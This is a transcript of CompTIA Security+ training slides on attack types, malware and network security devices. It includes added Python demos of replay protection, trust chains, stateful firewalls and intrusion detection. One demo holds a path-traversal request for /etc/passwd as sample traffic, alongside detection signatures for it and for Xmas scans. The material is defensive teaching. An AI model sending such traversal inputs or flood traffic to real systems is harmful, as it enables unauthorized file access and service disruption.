CompTIA Security+ Training
CompTIA Security+ Training Instructor: Lisa Szpunar
Getting Started with CompTIA Security+ Training
CompTIA Security+ Training
Getting Started with CompTIA Security+ Training
In This Lesson:
About Your Instructor
About This Course
About Your Instructor
Lisa Szpunar
• Master's degree in computer science
–Specialization in systems design and analysis and security
• Certifications
–CompTIA Security+ SY0-201 and SY0-301
–MCTS
About This Course
• Suitable for someone who has passed the CompTIA Network+ certification or who has equivalent knowledge
• Covers 100% of the CompTIA Security+ SY0-301 objectives
• Lessons are best watched in order
• Lesson layout
1. Overview of what will be covered in the lesson
2. Lesson content
3. Vocabulary list of new terminology introduced in that lesson
4. A quick review of what was covered in the lesson
About This Course
• You will learn about:
–The fundamentals of IT security
–How to analyze the threats you will be up against
–Topics to educate employees and users about
–Helping to integrate security with business needs
–So much more!
About This Course
Introduction to IT Security
Types of Attacks
Malware Prevention and Cleanup
Network Device Security
Secure Network Administration
Secure Network Design
TCP/IP Protocols and Port Security
Attacks on Wireless Networks
Securing Wireless Networks
Host Security
Securing Applications
Data Security
Authentication, Authorization, and Access Control
Physical and Environmental Security
Authentication Services
User Account Management
Risk Management
Threat and Vulnerability Assessment and Detection
Risk Mitigation and Deterrence
Log Monitoring and Reporting
Business Continuity
Disaster Recovery Planning
Incident Response
User Education
Social Engineering
Cryptography Concepts
Cryptography Tools
Public Key Infrastructure (PKI) Concepts
PKI Implementation
Preparing for your CompTIA Security+ SY0-301 Certification Exam
Next Steps
Introduction to IT Security
In This Lesson:
What is IT Security?
Key Terms You Should Know
Confidentiality
Integrity
Availability
Authentication
Authorization
Accounting
Exam Objective:
2.8 Exemplify the concepts of confidentiality, integrity and availability
What is IT Security?
• Precautions taken to guard against incidents
–Attacks
–Mischievous behavior
–Human error
• Physical devices, software, configurations, policies, and user education
• Prevent, detect, and recover from an incident
• Keeps data safe from unauthorized access, modification, or destruction during storage and transmission
• Must use a multifaceted approach – security in layers
Key Terms You Should Know
Assets: Any type of data or device that helps to support your information systems
Attacker: An entity that is attempting to gain unauthorized access or do harm to a system or information
Mitigation: Any method used to lower the likelihood or impact of a threat
Non-Repudiation: Prevents a party from denying involvement in a transaction after it has taken place. Also proves that the transaction was complete and the intended party received the data
Vulnerability: Any sort of weakness in a system that can be exploited. This can include software bugs, human errors, or a bad configuration
Threat: Any potential person, action, or circumstance with the ability to cause damage to a system
Risk: The likelihood that a vulnerability will be used or exploited by an attacker as well as the impact of the exploit
Exploit: The actual action that compromises the security or integrity of a system or information
The Information Security Triad – CIA
[Diagram: Confidentiality, Integrity, and Availability surrounding Data and Services]
Confidentiality: Protects data and communications from being seen by unauthorized people
Integrity: Data should not be able to be modified without being detected
Availability: What good is a service if it's not up and running?
The AAA Protocol
Authentication: A process where the person's identity is determined. This is usually done by providing evidence to prove that the person or system is who they claim to be.
Authorization: Determines whether the person or object is permitted to perform an activity or access a resource.
Accounting: All access to resources (and failed attempts at access) are recorded for later review.
What We Covered
What is IT Security?
Key Terms You Should Know
Confidentiality
Integrity
Availability
Authentication
Authorization
Accounting
Types of Attacks
In This Lesson:
Exam Objective:
3.2 Analyze and differentiate among types of attacks
Attacks on Data in Transit
Spoofing/Poisoning
Pharming
Man-in-the-middle
Replay
Denial of Service (DoS)
Distributed DoS
Smurf
Scanners and Sniffers
Attacks Via Email and Other Communications
Spam
Phishing
Other Attacks
Privilege Escalation
Transitive Access
Client-side Attacks
Attacks on Data in Transit
Spoofing/Poisoning
Making data appear to have come from somewhere it did not or be something that it is not.
Example: An attacker changes the MAC address of his wireless card to look like it is from a valid internal machine and uses it to gain access.
Common spoofing types (what is spoofed – result):
IP Spoofing: IP source address – Data appears to have come from a trusted host
ARP Spoofing/Poisoning: MAC address – Data looks like it came from a network that it didn't
DNS Spoofing/Poisoning: DNS info – Users are sent to the wrong website. Email is rerouted to the wrong place.
Pharming
Take traffic intended for one destination and redirect it to another.
• Uses DNS spoofing or changes the hosts file on the victim's computer
• Bogus pharming site usually looks nearly identical to the legitimate site
• Tricks you into entering personal data like username and password
Example: You think you are going to a website that you frequent. The site looks fine and you enter your login information. You receive a login error even though you have given the correct credentials.
Man-in-the-Middle
Two parties think they are communicating with each other. The attacker is actually between the two intercepting and controlling the communication.
• Active attack
• Attacker could be just eavesdropping or altering data
Mitigation
• Strong mutual authentication
• Public Key Infrastructure
• One-time pads
[Diagram: Client A – MITM – Server B]
Replay
The attacker captures information in transit and then re-sends it later.
Example: Attacker obtains a copy of logon/authentication info and uses it later to gain access to a system
Mitigation
• One-time-use session tokens
• Clock synchronization
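The two mitigations above work together, and the added example below (it is not part of the course material) shows how a server applies them. The message format, the shared key and the fake clock are constructed for illustration: a client login carries a random one-time nonce and a timestamp, both bound by an HMAC; the server rejects a message whose nonce it has already consumed (the captured copy re-sent) and a message whose timestamp falls outside the tolerated clock skew (a copy re-sent much later).

```python
"""Replay detection with one-time session tokens and synchronized clocks.

Added example, not from the course. Message layout, SHARED_KEY and the
controllable clock are constructed for the demonstration.
"""
import hashlib
import hmac
import os
import time

SHARED_KEY = b"constructed-shared-secret"  # constructed; real systems derive a per-session key
MAX_CLOCK_SKEW = 30.0                      # seconds of drift tolerated between the two clocks


def _tag(user, nonce, ts):
    """HMAC-SHA256 over user, nonce and timestamp so none of them can be edited in transit."""
    body = f"{user}|{nonce}|{ts:.3f}".encode()
    return hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest()


def make_login(user, ts):
    """Client side: build a login message carrying a fresh one-time nonce."""
    nonce = os.urandom(16).hex()
    return {"user": user, "nonce": nonce, "ts": ts, "mac": _tag(user, nonce, ts)}


class Server:
    """Server side: checks the MAC, then freshness, then nonce uniqueness."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.seen_nonces = set()  # one-time tokens that have already been accepted

    def verify(self, msg):
        if not hmac.compare_digest(_tag(msg["user"], msg["nonce"], msg["ts"]), msg["mac"]):
            return "bad-mac"      # altered or forged message
        if abs(self.clock() - msg["ts"]) > MAX_CLOCK_SKEW:
            return "stale"        # captured long ago; synchronized clocks make this detectable
        if msg["nonce"] in self.seen_nonces:
            return "replay"       # the same token presented a second time
        self.seen_nonces.add(msg["nonce"])
        return "ok"


def demo():
    """Legitimate login, immediate replay, late replay, and a tampered copy."""
    clock = [1000.0]                                   # constructed, controllable clock
    server = Server(clock=lambda: clock[0])
    msg = make_login("alice", clock[0])
    first = server.verify(msg)                         # 'ok'
    replayed = server.verify(dict(msg))                # identical copy re-sent -> 'replay'
    clock[0] += 3600                                   # one hour later
    late = server.verify(make_login("alice", 1000.0))  # old timestamp -> 'stale'
    tampered = server.verify(dict(msg, user="admin"))  # edited field -> 'bad-mac'
    return first, replayed, late, tampered


if __name__ == "__main__":
    print(demo())
```

The order of the checks matters: the MAC is verified first so that an attacker cannot use the nonce set or the clock window to learn anything from unauthenticated input, and the clock window bounds how long consumed nonces must be remembered, since anything older than MAX_CLOCK_SKEW is rejected as stale regardless.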
Denial of Service (DoS)
The attacker attempts to overload resources like a web server using large amounts of data.
• DoS aims to
–Deny access to resources or information
–Crash a website or operating system
• DoS works by
–Occupying all available bandwidth and/or computing power
Symptoms
• Unusually slow network performance
• Website down
Mitigation (just a little)
• Patch Management
• Firewall
• Intrusion Prevention System (IPS)
Common DoS Types
Ping of Death: Ping for acknowledgement with too many ICMP packets to handle
Buffer Overflow: Overflow the buffer with larger data than it can handle
TCP SYN Flooding: Open too many TCP sessions to handle
Distributed Denial of Service (DDoS)
Uses multiple systems to magnify the intensity of the DoS attack. The attacker uses a master system that coordinates third-party zombie nodes to participate in the DoS attack.
Smurf
An attacker spoofs ICMP packets so that they look like they came from the host that is the target of the attack.
These packets are broadcast to ping a group of hosts on a network.
All the hosts reply to the target host, overloading it and possibly overloading the network along the way.
[Diagram: spoofed ping requests are broadcast; the ICMP ping replies all go to the target]
Scanners and Sniffers
• Network Scanner/Sniffer
–Captures and displays network traffic
–Attacker must have internal access
–Mitigation: Proper physical security and security policies
• Port Scanner/Sniffer
–Systematically query ports to see which ones are open
–Attacker can be internal or external
–Xmas scan is an advanced scanner that can get around firewalls
–Mitigation: Properly configure routers and employ firewalls
Attacks Via Email and Other Communications
Spam
• Any unwanted or unsolicited communication
• Sent in bulk
• Normally refers to unwanted email
–Spim is spam over instant messenger
–Forums, newsgroups, text, everywhere
• Can contain malware or links to sites infected with malware
• Costs companies productivity and money for anti-spam services
Mitigation
• Anti-Spam filter
Phishing
Trying to get personal information by pretending to be a trusted person, company, or website.
• Often comes as email
• Uses logos and color schemes to try to mimic the legitimate entity
• Tries to create a sense of urgency or fear
–Poses as the security team or customer service rep
• Mitigation
–User education
–Spam filter
Spear Phishing: Using information specific to a person/company to make a phishing attempt seem more legitimate
Whaling: Spear phishing targeted at executives or people with access to especially sensitive information
Vishing: Phishing over VoIP
Other Attacks
Privilege Escalation
The ability of someone or an application to gain privileges and access that they are not intended to have.
• Configuration oversight
• Debugging backdoor left in code
• Could be an outside attacker, a fortuitous insider, or even a malicious insider
Mitigation
• Account Auditing and Management
• Least Privilege
• Code Review
Transitive Access
When trust is transferred to a third party through a known trusted entity.
• Examples: Joint ventures, consultants
• Mitigation: Don't give trust to your entire forest. Instead create a separate forest with just the resources you want to share.
[Diagram: trust relationships chained from one party to the next]
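As an added example (not part of the course), the following models trust as a directed graph, follows it transitively the way the key-term definition describes (A trusts B, B trusts C, so A trusts C), and compares what an outside consultant can reach when the whole forest is trusted against the slide's mitigation of a separate resource forest. All party, forest and resource names are constructed placeholders.

```python
"""Transitive trust and what it exposes.

Added example, not from the course. An edge X -> Y in `trusts` means X
trusts Y, so Y's accounts can reach X's resources. Names are constructed.
"""
from collections import deque


def trusted_parties(trusts, owner):
    """Every party that can reach `owner`'s resources once trust is followed transitively."""
    reachable, queue = set(), deque([owner])
    while queue:
        node = queue.popleft()
        for trusted in trusts.get(node, ()):
            if trusted not in reachable:
                reachable.add(trusted)
                queue.append(trusted)
    return reachable


def exposed_resources(trusts, resources, outsider):
    """Resources reachable by `outsider`: everything owned by a party that transitively trusts it."""
    exposed = set()
    for owner, owned in resources.items():
        if outsider in trusted_parties(trusts, owner):
            exposed |= owned
    return exposed


def demo():
    """Whole-forest trust versus a separate resource forest holding only the shared data."""
    # Constructed scenario: the company trusts a joint-venture partner, who trusts a consultant.
    whole_forest_trusts = {"CorpForest": {"Partner"}, "Partner": {"Consultant"}}
    whole_forest_resources = {"CorpForest": {"HR-DB", "Finance", "ProjectShare"}}
    before = exposed_resources(whole_forest_trusts, whole_forest_resources, "Consultant")

    # Mitigation from the slide: only a separate forest with the shared resources trusts the partner.
    resource_forest_trusts = {"ResourceForest": {"Partner"}, "Partner": {"Consultant"}}
    resource_forest_resources = {
        "CorpForest": {"HR-DB", "Finance"},
        "ResourceForest": {"ProjectShare"},
    }
    after = exposed_resources(resource_forest_trusts, resource_forest_resources, "Consultant")
    return before, after


if __name__ == "__main__":
    print(demo())
```

The consultant never appears in the company's own trust list in either design; the difference in exposure comes entirely from where the chain of trust starts, which is why the separate forest limits what a downstream party can reach.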
Client-side Attacks
An attack that exploits the client–server relationship. A user downloads something from a trusted server (FTP, file share, email, web, etc.) and unknowingly gets malicious code too.
• Allows attacker to execute programs on the infected machine
• Programs run at the permission level of the user
• If a client does not interact with the server there is no risk of getting any harmful data from the server.
Mitigation
• Firewall with Intrusion Prevention System
Key Terms You Should Know
Spoofing: Data that masquerades as something it isn't. Data that looks like it is from a legitimate source
Pharming: An attack that takes traffic intended for one destination and redirects it to another
Man-in-the-Middle: The attacker impersonates two endpoints and controls the communication between them
Replay: An attacker captures a data transmission and resends it later
Denial of Service: Deprive the intended users of access to a system by overwhelming resources and bandwidth with larger amounts of data than it can handle
Distributed DoS: Using the resources of many different systems (usually without their consent) to launch a DoS attack
Smurf: Broadcasting spoofed ICMP pings to many hosts on a network and aiming the replies at one target machine, creating a DoS attack
Spam: Unsolicited bulk email or other communication
Spim: Spam over instant messenger
Phishing: Pretending to be a known company or person and asking for personal information like passwords or credit card numbers
Spear Phishing: Using knowledge of a person or company to appear trustworthy and extract sensitive information
Whaling: Spear phishing aimed at a high-ranking person to gain access to especially sensitive information
Vishing: Using the anonymity of VoIP to employ phishing schemes
Privilege Escalation: Obtaining permissions, privileges, and access that one is not intended to have
Transitive Access: A trusts B, B trusts C, so A trusts C. May be without their knowledge or consent
Client-side Attacks: A malicious server doles out rogue code to the clients that access it
Malicious Insider Threat: An employee that has malevolent intent against his or her company
What We Covered
Attacks on Data in Transit
Spoofing/Poisoning
Pharming
Man-in-the-middle
Replay
Denial of Service (DoS)
Distributed DoS
Smurf
Scanners and Sniffers
Attacks Via Email and Other Communications
Spam
Phishing
Other Attacks
Privilege Escalation
Transitive Access
Client-side Attacks
Malicious Insider Threat
Malware Prevention and Cleanup
In This Lesson:
Viruses
Worms
Trojans
Spyware
Adware
Rootkits
Backdoors
Logic Bombs
Botnets
Ransomware
Malware Mitigation
Malware Removal
Exam Objective:
3.1 Analyze and differentiate among types of malware
Malware
• A combination of the words malicious and software
–Broad category of software threats
–Created with the intent of being damaging (or just annoying)
• Malicious payloads can:
–Consume bandwidth and resources
–Vandalism – delete files
–Install a backdoor
–Make the PC part of a botnet
–Data theft
–Keystroke logging
–Install unwanted software like other malware
–Display advertisements
Viruses
• Computer viruses can replicate themselves
• In order to spread to another computer it must attach itself to a program or file
• Spread by direct action
–send an email attachment
–share files on removable media
[Diagram: a virus attached to a host program or file]
Virus Types
Program/File – viruses that create or infect executable files
–Parasitic: Appends itself to a legitimate host file. When the host file is opened the virus executes first
–Companion: Creates a new program with the same name as an existing program
–Macro: Written in macro language. This virus is embedded in Microsoft Office templates and runs when the document is opened
Concealment – viruses that attempt to avoid detection by antivirus software
–Polymorphic: Changes its code or mutates each time it runs while keeping the function intact
–Retrovirus: Attacks the antivirus software itself
–Stealth: Hides by intercepting the antivirus software's processes. Example: the process of checking a file's size to see if a virus has been added
Other
–Boot Sector: Infects the master boot record
–Multipartite: Infects and spreads in multiple ways
Worms
• Has the ability to spread without human interaction
• Can replicate itself on your system and send those copies to other machines
• Uses communication/transport features already set up on your machine – like email
Example: A worm uses your email program to send copies of itself to everyone in your address book.
[Diagram: a worm copying itself from machine to machine]
Trojans
• Appears to be some kind of desired software or file
• Is actually concealing malicious code
• User is tricked into opening or installing it
• Cannot replicate itself
• A computer with trojan malware installed can now be used by attackers
–Botnet
–Data theft, modification, or deletion
–Proxy
Spyware
• Cannot spread on its own
• Collects computer and user information
–Internet usage
–Passwords/account numbers
• Can control as well as monitor
–Install additional software – adware
–Redirect browser activity
–Change settings
• Usually installed without the user's knowledge or consent
• Presence is hard to detect
• Forwards information to attacker
Adware
• Automatically displays or downloads advertisements
• Whether or not the user has consented
• Not necessarily malware
–Can be used in exchange for free or discounted access to a program or service
• Mobile phone apps
Pop-ups
• Not all pop-ups and pop-unders are adware
• Use an anti-spyware/pop-up blocker program like Windows Defender
Rootkits
• Allows continued root access to a computer
• The attacker must have obtained root access to install the rootkit
–Clicking yes to a prompt asking for permission
• Actively hides from administrators, OS, and antivirus
Backdoors
• A hidden method of bypassing the normal authentication process
• Can be hard coded in by a program's creator
• Can be added by malware
–Trojans
–Rootkits
Logic Bombs
• Malware designed to launch based on a predetermined event
–Date and time (time bomb)
–Deletion of a particular user account
–Reboot
• Delivers a malicious payload
–Delete data
–Destroy network infrastructure
Botnets
A colony of remote machines that are infected with malware allowing an attacker to use their resources to coordinate an attack.
• Example uses
–Distributed denial of service attacks
–Sending spam
–Brute force attacks
• Spammers or others can purchase the use of botnets that are already set up
Ransomware
• Holds systems or data hostage by encrypting it
• Threatens harmful or destructive action
• Demands ransom money for the return of the data or the removal of malicious code
Malware Mitigation
• Install antivirus software
• ...and update antivirus software
• Disallow common vehicles for viruses
–.exe files
–Macros
• Least privilege
• User education
–Acceptable use policy
• Backups
Scareware
[Example scareware pop-up shown on the slide: "Virus Found! Click Here to Remove / Continue Unprotected. Viruses cause: privacy invasion, security risks, system crashes, infecting other computers"]
Malware Removal
1. Remove the infected computer from the network
2. Take an image or backup files to an isolated drive
3. Antivirus software
4. Internet search (be very cautious)
• Malware removal tools
• Infection specific tools or tutorials
• Forums and blogs
5. Restore or reinstall the OS
Key Terms You Should Know
Viruses: Malicious code that must attach itself to another piece of code to replicate
Worms: Independent malicious code that self-replicates
Trojans: Appears to provide one desired service but also (or instead) has a hidden purpose
Spyware: Malware that works on behalf of a third party to gather information and install more malware on an infected machine
Adware: Software that automatically downloads and displays advertisements
Rootkits: Code that offers the attacker prolonged remote root access
Backdoors: An intentional or forced way around normal authentication and access control
Logic Bombs: Malicious code that is set to launch after a specific condition is met
Botnets: A group of remote hosts with code installed that allows an attacker to use their resources to anonymously send attacks and spam
Ransomware: Malicious code that holds data or systems hostage and will only release them once a ransom demand is met
What We Covered
Viruses
Worms
Trojans
Spyware
Adware
Rootkits
Backdoors
Logic Bombs
Botnets
Ransomware
Malware Mitigation
Malware Removal
Network Device Security
In This Lesson:
Firewalls
Routers
Switches
Load Balancers
Proxies
Web Security Gateways
VPN Concentrators
Network-based Intrusion Detection and Intrusion Prevention
Other Security Appliances
Protocol Analyzers / Sniffers
Host-based Filtering Tools
Exam Objective:
1.1 Explain the security function and purpose of network devices and technologies
Firewalls
• Purposes
–Isolate a network or part of a network
–Control and filter traffic from untrusted sources
–Network address translation (NAT)
–Create a demilitarized zone (DMZ)
• Form of
–Hardware – Stand-alone – Network-based
–Software – Integrated – Host-based
Firewall Best Practices
• All inbound and outbound communication should be filtered
• Deploy firewalls between different departments and/or security levels
• Keep patched and updated
Firewall Types
• Packet Filter
–Filters packets based on their header information
• Source / Destination address (port number)
–Doesn't look at packet contents
Example: a packet filtering firewall has a rule to disallow Telnet access. The firewall looks at the IP header and if port 23 is present, the packet is dropped or denied.
Strengths
• Already in your environment
• Fast
Weaknesses
• Static and "unintelligent"
• Spoofing / malicious content
Firewall Types
• Proxy Firewall
–Acts as an intermediary between your network and the outside
–Intercepts, inspects, and repackages
• Can look at packet content
• Forwards or rejects data based on a set of rules
• Application Level
–More advanced rules for one application/service/port
Strengths
• Hides internal users from the external network
Weaknesses
• Slower
• Harder to set up
Firewall Types
• Web Application Firewall
–Server-side firewall that protects the web-client to web-server interactions
–Application specific
–Works to prevent:
• SQL injection
• Cross-site scripting (XSS)
• Other web application attacks
Firewall Types
• Stateful Inspection (or Stateful Packet Filtering)
–Keeps track of the state of network connections
• Uses a state table to log every communication channel
–Knows what to expect from a given communication session
–Keeps ports closed unless they are in use
Strengths
• Application-layer awareness
• Faster than proxy firewalls
Weaknesses
• Denial-of-Service attack can overload the state table
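The added example below (it is not from the course) puts the packet filter from the earlier slide and the stateful inspection described here side by side on the same constructed packets. The packets are header-only tuples with addresses from documentation ranges, the rule set contains only the slide's Telnet rule, and the state table is deliberately tiny so that half-open sessions can fill it, which is the Denial-of-Service weakness listed above.

```python
"""Static packet filtering versus stateful inspection.

Added example, not from the course. Packets, rule set and table size are
constructed for the demonstration; addresses are documentation ranges.
"""
from collections import namedtuple

Packet = namedtuple("Packet", "src dst sport dport flags")  # flags: frozenset of TCP flag names

DENIED_PORTS = {23}  # constructed rule set: disallow Telnet, as in the slide example


def packet_filter(pkt):
    """Static rule: decide from header fields alone, with no memory of earlier packets."""
    if pkt.dport in DENIED_PORTS or pkt.sport in DENIED_PORTS:
        return "deny"
    return "allow"


class StatefulFirewall:
    def __init__(self, max_states):
        self.max_states = max_states  # small on purpose so the table can fill up in demo()
        self.table = {}               # (src, sport, dst, dport) -> connection state

    def inspect(self, pkt):
        verdict = packet_filter(pkt)  # static rules still apply first
        if verdict == "deny":
            return verdict
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.table or reverse in self.table:
            # part of a session we already track; a plain ACK completes the handshake
            if "ACK" in pkt.flags and "SYN" not in pkt.flags:
                self.table[key if key in self.table else reverse] = "ESTABLISHED"
            return "allow"
        if pkt.flags == frozenset({"SYN"}):
            # new session attempt: needs a free slot in the state table
            if len(self.table) >= self.max_states:
                return "drop:table-full"
            self.table[key] = "SYN_SENT"
            return "allow"
        return "drop:no-state"  # e.g. a stray ACK that matches no known session


def demo():
    fw = StatefulFirewall(max_states=3)
    results = {}
    client_syn = Packet("10.0.0.2", "203.0.113.5", 40000, 80, frozenset({"SYN"}))
    server_synack = Packet("203.0.113.5", "10.0.0.2", 80, 40000, frozenset({"SYN", "ACK"}))
    stray_ack = Packet("198.51.100.9", "10.0.0.2", 4444, 40001, frozenset({"ACK"}))
    telnet = Packet("10.0.0.2", "203.0.113.7", 40002, 23, frozenset({"SYN"}))
    results["outbound-syn"] = fw.inspect(client_syn)        # allow; state entry created
    results["return-synack"] = fw.inspect(server_synack)    # allow; matches the reverse key
    results["stray-ack-static"] = packet_filter(stray_ack)  # static filter lets it through
    results["stray-ack-stateful"] = fw.inspect(stray_ack)   # stateful firewall has no session for it
    results["telnet"] = fw.inspect(telnet)                  # denied by the static rule
    # SYN flood: half-open sessions from many sources consume the remaining table slots
    flood = [Packet(f"198.51.100.{i}", "10.0.0.5", 1000 + i, 80, frozenset({"SYN"})) for i in range(5)]
    results["flood"] = [fw.inspect(p) for p in flood]
    legit = Packet("10.0.0.3", "203.0.113.5", 40010, 80, frozenset({"SYN"}))
    results["legit-after-flood"] = fw.inspect(legit)        # collateral damage: table is full
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20s} {verdict}")
```

The last result is the point of the slide's weakness bullet: once the half-open entries occupy the table, a legitimate new session is dropped even though no rule forbids it. Real stateful firewalls counter this with idle timeouts on SYN_SENT entries and per-source limits, neither of which this small model includes.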
Routers
• Purposes
–Communication between separate networks
–Segmentation
–Determine the best path for data packets to travel
–Firewall
• Form of
–Hardware – Stand-alone
–Integrated
Router Best Practices
• Configure the router to prevent unauthorized modifications to the routing tables
• Change the default password
• Keep patched and updated
Routers
• Security Functions
–Segmentation
• Limits broadcast traffic
• Isolation
–Access Control Lists (ACL)
–Filtering
• Vulnerabilities
–Poor configuration and hardening
–Unauthorized routing table entry
[Diagram: a router between the Internet, Internal Network 1, and Internal Network 2]
Switches
• Purposes
–Create networks or subnets
–Join resources together
• Form of stand-alone hardware
Switches
• Security Function
–Data not broadcast (unlike hubs) so it can't be sniffed
–MAC address filtering rules (basic firewall)
• Vulnerabilities
–ARP Spoofing / Man-in-the-Middle
–Older switches use Telnet to configure
–An attacker with access can turn on mirroring to sniff all traffic
Switch Best Practices
• Hubs should be replaced with switches
• Configuration of the switch should be done over secure ports/protocols
• Keep patched and updated
Load Balancers
• Purpose
–Distributes computing workload across multiple machines
• Form of
–Hardware – Stand-alone
–Software – Integrated (NAT, Routing, Firewall)
[Diagram: Client – Load Balancer – Redundant Servers]
Load Balancers
• Security Function
–Availability
–Can provide failover
–Usually integrated with other security features
• Vulnerabilities
–Depends on what it is integrated with
–Model specific vulnerabilities
• Keep it patched and up-to-date
Proxies
• Purposes
–Intermediary device or software that acts on behalf of a system or person
–Keeps copies of commonly used items for quick delivery (cache)
• Form of
–Computer system
–Application
Proxy Best Practices
• Internal user interaction with the outside internet should go through a proxy
• Automatically update the list of and block known malicious sites
• Cache often accessed sites
Proxies
• Security Functions
–Filter and control outbound traffic
• Proprietary data
• Outgoing malicious content
• Prevent visiting restricted sites
–Keep internal machines anonymous
• Vulnerabilities
–Single point for an attacker to gain access to data
[Diagram: Client – Proxy – Resource (www.example.com web server), with addresses 1.1.1.1 and 2.2.2.2]
Web Security Gateways
• Purposes
–Proxy, content filtering, and other security functionality in one device
• Form of
–Appliance
• Security Functions
–Malware inspection/filtering
–URL filtering
–Content monitoring
–Productivity monitoring
–Data leak prevention (DLP)
–Policy compliance
VPN Concentrators
• Purposes
–Establish and handle large amounts of simultaneous virtual private network (VPN) tunnel connections
–Provide authentication and access control
• Form of
–Appliance
• Security Functions
–Authentication
–Authorization
–Accounting
–Encryption
• Weakness
–Denial-of-Service
Network-based Intrusion Detection Systems (NIDS)
• Purposes
–Inspect network traffic and identify suspicious patterns
–Issue alerts when potential attacks have taken place
• Form of
–A system of sensors, controllers, and other components
–Hardware – Stand-alone
–Software – Integrated
[Diagram: a tap between the Internet and the network feeding the NIDS]
Network-based Intrusion Detection Systems (NIDS)
• Security Functions
–Filter traffic to look for unauthorized use or attacks
• Weaknesses
–False positives and false negatives
–Cannot inspect encrypted data
–Needs active manual involvement
–High traffic volume
Passive Response
• Log event details
• Notify or send an alert to the IDS administrator
• Ignore attacks that are harmless
Active Response
• Terminate the offending process or session
• Make configuration changes to block the offending port or IP address
• Isolate attack in honeypot and monitor it
Network-based Intrusion Prevention Systems (NIPS)
• Purposes
–Filter and detect just like IDS
–Respond to an attack in process
• Form of
–A hardware and software system
• Security Functions
–Able to combat attacks in real time
• Weaknesses
–More expensive
–Harder to configure
Kinds of NIDS and NIPS
• Signature-based (uses an attack signature database)
–Compares traffic to a database of known attack signatures
• Keep this database up-to-date!
• Content-based signatures
–Particular flag set, string of characters, etc.
• Context-based signatures
–An unusually high level of ICMP pings and port scans
• Behavior-based/Anomaly-based/Heuristic (uses a network history database)
–Looks for changes to usual network behavior
• Higher traffic volume
• Repeated policy violations
–Compare the current traffic and events to a network history database
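To make the three detection styles concrete, here is an added example (not from the course) that runs each over a constructed set of traffic records. The records, the tiny signature database, the ICMP threshold and the baseline history of per-minute packet counts are all constructed for the demonstration; a real sensor would populate them from captured packets and a vendor signature feed.

```python
"""Signature-based and anomaly-based detection over constructed traffic records.

Added example, not from the course. TRAFFIC, the signature tables, the ICMP
threshold and BASELINE_PACKETS_PER_MIN are constructed for illustration;
addresses are documentation ranges.
"""
import statistics
from collections import Counter

# Constructed records: (src, proto, dport, flags, payload) as a sensor might summarize them.
TRAFFIC = [
    ("10.0.0.8", "tcp", 80, "ACK,PSH", "GET /index.html HTTP/1.1"),
    ("198.51.100.4", "tcp", 80, "ACK,PSH", "GET /../../etc/passwd HTTP/1.1"),  # content signature hit
    ("198.51.100.7", "tcp", 22, "FIN,PSH,URG", ""),                           # Xmas flag combination
    ("10.0.0.8", "udp", 53, "", "example.com A?"),
] + [("203.0.113.9", "icmp", 0, "", "echo-request") for _ in range(25)]      # burst of pings

CONTENT_SIGNATURES = {"path-traversal": "/etc/passwd"}        # constructed signature database
FLAG_SIGNATURES = {"xmas-scan": {"FIN", "PSH", "URG"}}
ICMP_THRESHOLD = 20                                            # context signature: pings per window per source
BASELINE_PACKETS_PER_MIN = [120, 130, 125, 118, 135, 128, 122]  # constructed network history


def signature_alerts(records):
    """Content-based signatures: a byte string or a flag combination inside a single record."""
    alerts = []
    for src, _proto, _dport, flags, payload in records:
        for name, needle in CONTENT_SIGNATURES.items():
            if needle in payload:
                alerts.append((f"sig:{name}", src))
        flag_set = set(filter(None, flags.split(",")))
        for name, required in FLAG_SIGNATURES.items():
            if required <= flag_set:
                alerts.append((f"sig:{name}", src))
    return alerts


def context_alerts(records, threshold=ICMP_THRESHOLD):
    """Context-based signature: an unusually high count of ICMP packets from one source."""
    icmp_by_src = Counter(src for src, proto, *_ in records if proto == "icmp")
    return [("ctx:icmp-burst", src) for src, n in icmp_by_src.items() if n > threshold]


def anomaly_alerts(history, current, k=3.0):
    """Behaviour-based check: flag the current interval if it exceeds mean + k standard deviations."""
    mean = statistics.mean(history)
    sd = statistics.pstdev(history)
    if current > mean + k * sd:
        return [("anomaly:traffic-volume", current)]
    return []


def demo():
    return {
        "signature": signature_alerts(TRAFFIC),
        "context": context_alerts(TRAFFIC),
        "quiet-minute": anomaly_alerts(BASELINE_PACKETS_PER_MIN, 128),  # within baseline
        "busy-minute": anomaly_alerts(BASELINE_PACKETS_PER_MIN, 400),   # far above baseline
    }


if __name__ == "__main__":
    for kind, alerts in demo().items():
        print(kind, alerts)
```

The signature detectors find only what is in their tables, which is why the slide insists on keeping the database current, while the anomaly check finds the volume spike without knowing anything about the attack; the price is that a busy but legitimate minute would trigger it too, the false positive listed among the NIDS weaknesses.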
Other Security Appliances
• Spam Filters
–Appliance filters messages before they get to the mail server
–Block messages from known spammers
–Scan message for common spam elements
• Flag, separate, or completely block
–Looks at both incoming and outgoing mail
• All-in-one Security Appliance
–Stateful firewall
–IDS and IPS
–Data leak prevention
–Antivirus
–Anti-spam
–Content filtering
–Load balancing
–VPN
–Network analyzer
–Reporting
Protocol Analyzers / Sniffers
• Purposes
–Find unusual types/amounts of traffic
–Look for the traffic that infected systems send
–Find misconfigurations like open ports
–Capture traffic during incident response
–Can be placed to look at inbound, outbound, and internal traffic
• Form of
–Software on a PC that has a NIC in promiscuous mode
–A switch with port mirroring turned on
–A switch with a built-in port analyzer port
–Hardware taps
Host-based Filtering Tools
• URL Filtering
–Web browser blocks websites based on their URL address
–Checks URL against a list of known malware sites before showing the page
–Internet Explorer SmartScreen Filter, McAfee SiteAdvisor
• Content Inspection
–Scans the data you are trying to access for red flags
–Internet Explorer Content Advisor
–Can find network level content inspection software that works with proxies or other network devices
• Malware Inspection
–OS software that attempts to stop malware from entering a host
–Microsoft Security Essentials
CompTIA Security+ Training
Network Device Security
Key Terms You Should Know
Term Definition
Firewalls Hardware and/or software that protects the internal network from attackers on the outside public internet
Web Application Firewall
Used to secure a web-server against XSS and injection attacks
Routers A device that connects two or more networks and determines the path that data packets will take
Switches A device joins clients, servers, printers, and other resources to create a network
Load Balancers A network device that distributes computing workload across multiple machines
Proxies Acts as an intermediary and prevents direct connection between two parties
CompTIA Security+ Training
Network Device Security
• Web Security Gateways: Proxy and content filtering functionality in one device that filters all communication between the internal clients and the outside internet
• VPN Concentrators: A device that creates and secures multiple VPN connections
